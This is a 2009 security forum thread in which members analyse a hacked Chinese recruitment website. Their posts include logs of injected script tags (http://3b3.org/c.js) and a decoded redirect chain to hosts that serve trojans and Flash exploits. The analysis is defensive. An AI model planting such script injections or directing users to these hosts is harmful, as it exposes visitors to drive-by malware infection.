查看: 2864|回复: 11
收起左侧

[已鉴定] http://www.chinactm.com.cn/zh/index.asp被挂

[复制链接]
Mahone
发表于 2009-5-4 18:14:18 | 显示全部楼层 |阅读模式
一个重庆的人才网站,卡巴7.0报有4个恶意页面,我对网页代码不了解,请大家帮忙看看。
gtyre1
发表于 2009-5-4 19:03:54 | 显示全部楼层
Log is generated by FreShow.
[wide]http://www.chinactm.com.cn/zh/index.asp
    [script]http://www.chinactm.com.cn/zh/js/AC_RunActiveContent.js
    [script]http://www.chinactm.com.cn/zh/js/flink.js
    [script]http://www.chinactm.com.cn/zh/js/main.js
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://cn.jxmmtv.com/cn.js
    [script]http://cn.daxia123.cn/cn.js
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://www7.itsun.com/count.php?uuid=1840162&style=icon
    [script]http://www.chinactm.com.cn/zh/js/iqlinks.js
    [frame]http://bbs.jxwpl.com/hack.php?H_name=adv&u=168
gtyre1
发表于 2009-5-4 20:42:16 | 显示全部楼层
Log is generated by FreShow.
    [frame]http://nk7897.7766.org/a/a100.htm

能力有限
这个解了一下解不出
貌似在不断变化当中!
哪位朋友解一下
孔子
发表于 2009-5-4 21:01:36 | 显示全部楼层
Log is generated by FreShow.
[wide]http://www.chinactm.com.cn/zh/index.asp
    [script]http://www.chinactm.com.cn/zh/js/AC_RunActiveContent.js
    [script]http://www.chinactm.com.cn/zh/js/flink.js
    [script]http://www.chinactm.com.cn/zh/js/main.js
    [script]http://3b3.org/c.js
        [frame]http://nk7897.7766.org/a/a100.htm
            [object]http://nk7897.7766.org/a/a100.htm?2030729189=250309
                [frame]http://nk7897.7766.org/a/cnzz.htm
                    [frame]http://nk7897.7766.org/a/yy.htm
                    [frame]http://nk7897.7766.org/a/flash.htm
                    [frame]http://nk7897.7766.org/a/qb.htm
                    [frame]http://nk7897.7766.org/a/ippp.htm
                    [frame]http://nk7897.7766.org/a/ip.htm
                    [frame]http://nk7897.7766.org/a/02.htm
                    [frame]http://nk7897.7766.org/a/lz.htm
                    [frame]http://nk7897.7766.org/a/office.htm
                [script]http://nk7897.7766.org/a/\"http:\/\/js.tongji.cn.yahoo.com\/1083501\/ystat.js\"
                [script]http://count7.51much.com/cnt.php?uid=UA-1-12981&style=text&text=网站统计
        [frame]http://nk7897.7766.org/a/a100.htm
        [script]http://3b3.org/\"http:\/\/js.tongji.cn.yahoo.com\/908507\/ystat.js\"
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://cn.jxmmtv.com/cn.js
    [script]http://cn.daxia123.cn/cn.js
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://3b3.org/c.js
    [script]http://www7.itsun.com/count.php?uuid=1840162&style=icon
    [script]http://www.chinactm.com.cn/zh/js/iqlinks.js
    [frame]http://bbs.jxwpl.com/hack.php?H_name=adv&u=168

评分

参与人数 2经验 +5 人气 +1 收起 理由
aarwwefdds + 5 不错,没解完~~
於陵闲云 + 1 孔子,膜拜一下

查看全部评分

雨宫优子
发表于 2009-5-4 21:11:09 | 显示全部楼层
关于:hxxp://www.chinactm.com.cn/zh/index.asp解密的日志(全体输出 -  64):

Level  0>http://www.chinactm.com.cn/zh/index.asp
Level  1>http://www.chinactm.com.cn/zh/js/ac_runactivecontent.js
Level  1>http://www.chinactm.com.cn/zh/js/flink.js
Level  1>http://www.chinactm.com.cn/zh/js/main.js
Level  1>http://www.chinactm.com.cn/zh/swf/maintop.swf  ●
Level  1>http://www.chinactm.com.cn/zh/images/index_38.gif
Level  1>http://3b3.org/c.js
Level  2>http://nk7897.7766.org/a/a100.htm
Level  3>http://nk7897.7766.org/a/a100.htm?888071969=553240815&2497327571=305688212
Level  4>http://nk7897.7766.org/a/cnzz.htm
Level  5>http://nk7897.7766.org/a/office.htm
Level  6>http://nk7897.7766.org/a/office.htm?1121926251=2041682657
Level  7>http://nk7897.7766.org/a/office.js
Level  5>http://nk7897.7766.org/a/lz.htm
Level  6>http://nk7897.7766.org/a/lz.js
Level  7>http://wm5588.com/xh/windoss.css  ●
Level  5>http://nk7897.7766.org/a/02.htm
Level  6>http://nk7897.7766.org/a/02.htm?3114854885=3286105087&4265857150=1237905529
Level  7>http://nk7897.7766.org/a/set.js
Level  8>http://wm5588.com/xh/windoss.css  ●
Level  5>http://nk7897.7766.org/a/ip.htm
Level  6>http://nk7897.7766.org/a/bf.htm
Level  7>http://nk7897.7766.org/a/bf.js
Level  8>http://wm5588.com/xh/windoss.css  ●
Level  5>http://nk7897.7766.org/a/ippp.htm
Level  6>http://nk7897.7766.org/a/real.html
Level  7>http://nk7897.7766.org/a/re11.js
Level  8>http://wm5588.com/xh/windoss.css  ●
Level  6>http://nk7897.7766.org/a/real.htm
Level  7>http://nk7897.7766.org/a/real.htm?4071358636=3187886091
Level  8>http://nk7897.7766.org/a/real.js
Level  9>http://wm5588.com/xh/windoss.css  ●
Level  6>http://nk7897.7766.org/a/xl.htm
Level  7>http://nk7897.7766.org/a/xl.js
Level  8>http://wm5588.com/xh/windoss.css  ●
Level  5>http://nk7897.7766.org/a/qb.htm
Level  6>http://nk7897.7766.org/a/qb.js
Level  7>http://wm5588.com/xh/windoss.css  ●
Level  5>http://nk7897.7766.org/a/flash.htm
Level  6>http://nk7897.7766.org/a/fgg.html
Level  7>http://nk7897.7766.org/a/f115.swf  ●
Level  7>http://nk7897.7766.org/a/f64.swf  ●
Level  7>http://nk7897.7766.org/a/f47.swf  ●
Level  8>http://wm5588.com/xh/windoss.css  ●
Level  7>http://nk7897.7766.org/a/f45.swf  ●
Level  7>http://nk7897.7766.org/a/f28.swf  ●
Level  7>http://nk7897.7766.org/a/f16.swf  ●
Level  6>http://nk7897.7766.org/a/igg.html
Level  7>http://nk7897.7766.org/a/i115.swf  ●
Level  8>http://wm5588.com/xh/windoss.css  ●
Level  7>http://nk7897.7766.org/a/i64.swf  ●
Level  7>http://nk7897.7766.org/a/i47.swf  ●
Level  7>http://nk7897.7766.org/a/i45.swf  ●
Level  7>http://nk7897.7766.org/a/i28.swf  ●
Level  7>http://nk7897.7766.org/a/i16.swf  ●
Level  5>http://nk7897.7766.org/a/yy.htm
Level  6>http://nk7897.7766.org/a/14.js
Level  7>http://wm5588.com/xh/windoss.css  ●
Level  1>http://cn.jxmmtv.com/cn.js
Level  1>http://cn.daxia123.cn/cn.js
Level  1>http://www7.itsun.com/count.php?uuid=1840162&style=icon
Level  1>http://www.chinactm.com.cn/zh/js/iqlinks.js
Level  1>http://www.chinactm.com.cn/zh/swf/qlink.swf  ●
Level  1>http://bbs.jxwpl.com/hack.php?h_name=adv&u=168

Log by aarwwefdds(打点的均为真实木马地址,swf除外)
总算全部解完~~史上最BT挂马~~

评分

参与人数 1人气 +1 收起 理由
於陵闲云 + 1 aa,膜拜一下

查看全部评分

gtyre1
发表于 2009-5-4 21:30:29 | 显示全部楼层
呵呵,我也弄出来了
gtyre1
发表于 2009-5-4 21:31:38 | 显示全部楼层
一点一点慢慢的添加
卡死了
花间酒
发表于 2009-5-4 21:36:22 | 显示全部楼层
居然还校验参数才继续下一层。。。? 难怪刚才没解出来。。。
zwl19741214
发表于 2009-5-4 21:56:08 | 显示全部楼层
金山网盾清除了30项,这是日志
[2009-05-04 21:53:47] 发现opera.exe试图访问恶意网址:<script src=http://3b3.org/c.js></script>,已被成功阻止!
[2009-05-04 21:53:48] 发现opera.exe试图访问恶意网址:<script src=http://3b3.org/c.js></script>,已被成功阻止!
[2009-05-04 21:53:48] 发现opera.exe试图访问恶意网址:<script src=http://3b3.org/c.js></script>,已被成功阻止!
[2009-05-04 21:53:49] 发现opera.exe试图访问恶意网址:<script src=http://3b3.org/c.js></script>,已被成功阻止!
[2009-05-04 21:53:49] 发现opera.exe试图访问恶意网址:<script src=http://3b3.org/c.js></script>,已被成功阻止!
[2009-05-04 21:53:50] 发现opera.exe试图访问恶意网址:3b3.org/c.js,已被成功阻止!
[2009-05-04 21:53:50] 发现opera.exe试图访问恶意网址:3b3.org/c.js,已被成功阻止!
[2009-05-04 21:53:51] 发现opera.exe试图访问恶意网址:3b3.org/c.js,已被成功阻止!
[2009-05-04 21:53:52] 发现opera.exe试图访问恶意网址:3b3.org/c.js,已被成功阻止!
[2009-05-04 21:53:52] 发现opera.exe试图访问恶意网址:3b3.org/c.js,已被成功阻止!
[2009-05-04 21:53:53] 发现opera.exe试图访问恶意网址:<script src=http://3b3.org/c.js></script>,已被成功阻止!
[2009-05-04 21:53:53] 发现opera.exe试图访问恶意网址:<script src=http://3b3.org/c.js></script>,已被成功阻止!
[2009-05-04 21:53:54] 发现opera.exe试图访问恶意网址:<script src=http://3b3.org/c.js></script>,已被成功阻止!
[2009-05-04 21:53:54] 发现opera.exe试图访问恶意网址:<script src=http://3b3.org/c.js></script>,已被成功阻止!
[2009-05-04 21:53:54] 发现opera.exe试图访问恶意网址:<script src=http://3b3.org/c.js></script>,已被成功阻止!
[2009-05-04 21:53:55] 发现opera.exe试图访问恶意网址:<script src=http://3b3.org/c.js></script>,已被成功阻止!
[2009-05-04 21:53:55] 发现opera.exe试图访问恶意网址:<script src=http://3b3.org/c.js></script>,已被成功阻止!
[2009-05-04 21:53:55] 发现opera.exe试图访问恶意网址:<script src=http://3b3.org/c.js></script>,已被成功阻止!
[2009-05-04 21:53:55] 发现opera.exe试图访问恶意网址:<script src=http://3b3.org/c.js></script>,已被成功阻止!
[2009-05-04 21:53:56] 发现opera.exe试图访问恶意网址:<script src=http://3b3.org/c.js></script>,已被成功阻止!
[2009-05-04 21:53:56] 发现opera.exe试图访问恶意网址:<script src=http://3b3.org/c.js></script>,已被成功阻止!
[2009-05-04 21:53:56] 发现opera.exe试图访问恶意网址:<script src=http://3b3.org/c.js></script>,已被成功阻止!
[2009-05-04 21:53:57] 发现opera.exe试图访问恶意网址:<script src=http://3b3.org/c.js></script>,已被成功阻止!
[2009-05-04 21:53:57] 发现opera.exe试图访问恶意网址:<script src=http://3b3.org/c.js></script>,已被成功阻止!
[2009-05-04 21:53:57] 发现opera.exe试图访问恶意网址:<script src=http://3b3.org/c.js></script>,已被成功阻止!
[2009-05-04 21:53:58] 发现opera.exe试图访问恶意网址:<script src=http://3b3.org/c.js></script>,已被成功阻止!
[2009-05-04 21:53:58] 发现opera.exe试图访问恶意网址:<script src=http://3b3.org/c.js></script>,已被成功阻止!
[2009-05-04 21:53:58] 发现opera.exe试图访问恶意网址:<script src=http://3b3.org/c.js></script>,已被成功阻止!
[2009-05-04 21:53:58] 发现opera.exe试图访问恶意网址:<script src=http://3b3.org/c.js></script>,已被成功阻止!
[2009-05-04 21:53:59] 发现opera.exe试图访问恶意网址:<script src=http://3b3.org/c.js></script>,已被成功阻止!
xiaoqiang305
发表于 2009-5-4 22:32:25 | 显示全部楼层
那啥 谁解释下呗,就是  [frame]http://nk7897.7766.org/a/a100.htm
咋解的 我也没接出来
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-17 15:44 , Processed in 0.120917 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表